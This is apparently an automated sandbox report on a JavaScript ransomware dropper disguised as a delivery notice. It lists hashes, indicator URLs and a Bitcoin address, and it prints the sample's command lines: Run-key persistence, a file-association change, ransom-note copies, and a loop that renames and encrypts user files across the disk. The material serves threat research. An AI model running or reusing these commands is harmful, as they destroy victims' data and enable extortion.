Analysis
-
max time kernel
136s -
max time network
145s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
17-01-2021 18:02
Static task
static1
Behavioral task
behavioral1
Sample
Delivery_Notification_00896328.doc.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Delivery_Notification_00896328.doc.js
Resource
win10v20201028
General
-
Target
Delivery_Notification_00896328.doc.js
-
Size
248KB
-
MD5
0168089428c6aa371f4275d0872b0970
-
SHA1
d2595c0a40c4d8dcf9f7c711f472abc6ac0f592e
-
SHA256
dc20c80a0c1db5848ceef6714c6d774f3002a0c595638aff0410ae2ddabb710a
-
SHA512
915d7a3f63429a27dace53418d8b3216ef3b4b6ac82d63ecca6f1590aa7380449fb4fe3ec8eed5a9aa3a8dadeed5ef32091ecdf2e885aca8d998d8150d07f418
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\a.txt
19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
Signatures
-
Blocklisted process makes network request 8 IoCs
Processes:
wscript.exeflow pid process 10 1308 wscript.exe 11 1308 wscript.exe 13 1308 wscript.exe 16 1308 wscript.exe 18 1308 wscript.exe 20 1308 wscript.exe 21 1308 wscript.exe 23 1308 wscript.exe -
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
cmd.exedescription ioc process File renamed C:\Users\Admin\Pictures\CompressMount.tiff => C:\Users\Admin\Pictures\CompressMount.tiff.crypted cmd.exe File renamed C:\Users\Admin\Pictures\RevokePush.tiff => C:\Users\Admin\Pictures\RevokePush.tiff.crypted cmd.exe File renamed C:\Users\Admin\Pictures\SyncEdit.tiff => C:\Users\Admin\Pictures\SyncEdit.tiff.crypted cmd.exe File renamed C:\Users\Admin\Pictures\StepCompress.tif => C:\Users\Admin\Pictures\StepCompress.tif.crypted cmd.exe File renamed C:\Users\Admin\Pictures\UndoSplit.tif => C:\Users\Admin\Pictures\UndoSplit.tif.crypted cmd.exe File renamed C:\Users\Admin\Pictures\ConvertExit.raw => C:\Users\Admin\Pictures\ConvertExit.raw.crypted cmd.exe File renamed C:\Users\Admin\Pictures\UpdateMerge.raw => C:\Users\Admin\Pictures\UpdateMerge.raw.crypted cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt" reg.exe -
Modifies registry class 7 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted\ = "Crypted" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt\"" reg.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
wscript.execmd.execmd.execmd.exedescription pid process target process PID 1308 wrote to memory of 208 1308 wscript.exe cmd.exe PID 1308 wrote to memory of 208 1308 wscript.exe cmd.exe PID 1308 wrote to memory of 200 1308 wscript.exe cmd.exe PID 1308 wrote to memory of 200 1308 wscript.exe cmd.exe PID 1308 wrote to memory of 812 1308 wscript.exe cmd.exe PID 1308 wrote to memory of 812 1308 wscript.exe cmd.exe PID 1308 wrote to memory of 1520 1308 wscript.exe cmd.exe PID 1308 wrote to memory of 1520 1308 wscript.exe cmd.exe PID 1308 wrote to memory of 3296 1308 wscript.exe cmd.exe PID 1308 wrote to memory of 3296 1308 wscript.exe cmd.exe PID 1308 wrote to memory of 728 1308 wscript.exe cmd.exe PID 1308 wrote to memory of 728 1308 wscript.exe cmd.exe PID 208 wrote to memory of 1768 208 cmd.exe reg.exe PID 208 wrote to memory of 1768 208 cmd.exe reg.exe PID 812 wrote to memory of 912 812 cmd.exe reg.exe PID 812 wrote to memory of 912 812 cmd.exe reg.exe PID 200 wrote to memory of 372 200 cmd.exe reg.exe PID 200 wrote to memory of 372 200 cmd.exe reg.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Delivery_Notification_00896328.doc.js1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"3⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"3⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""3⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" nx4325ka8afy0z87t7xmrxbjokehkpiq0mc2)2⤵
- Modifies extensions of user files
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\a.txtMD5
512ad548377714262b373c665f17d1db
SHA10f05efd559b90eb77418c32fa86cfcba77b6e187
SHA25627966b12ff9831318138b9cf663fd8e25e9469c347fe630a2c6a491bf125e2ca
SHA512f0e7456eccd513a3b09ffe1411ba661716d37efeff6cdd06b00e7859c935655a0eb5e0d75deef9f56985ff360f41e61b8f2eefa819d0677c8aa72cfb2a788943
-
C:\Users\Admin\AppData\Local\Temp\a0.exeMD5
7c7ff5fdc3cc7705f4d42ec4e3eab8a5
SHA198416dfe3086b4dfb2cbc8170b01e292ef30d982
SHA256dc20be27348645f896c30914b3cbc66cdc7160702d3f307d3b1669095f483b27
SHA51277fee3199567ff012dd5f617b620bbcbd5eefb940a795063e42cdaa8b2d224e810d16ce7b88544c5a429f75f9c7a9434613be4276097a8a05d9ec7fa4daab9e9
-
memory/200-3-0x0000000000000000-mapping.dmp
-
memory/208-2-0x0000000000000000-mapping.dmp
-
memory/372-11-0x0000000000000000-mapping.dmp
-
memory/728-7-0x0000000000000000-mapping.dmp
-
memory/812-4-0x0000000000000000-mapping.dmp
-
memory/912-9-0x0000000000000000-mapping.dmp
-
memory/1520-5-0x0000000000000000-mapping.dmp
-
memory/1768-8-0x0000000000000000-mapping.dmp
-
memory/3296-6-0x0000000000000000-mapping.dmp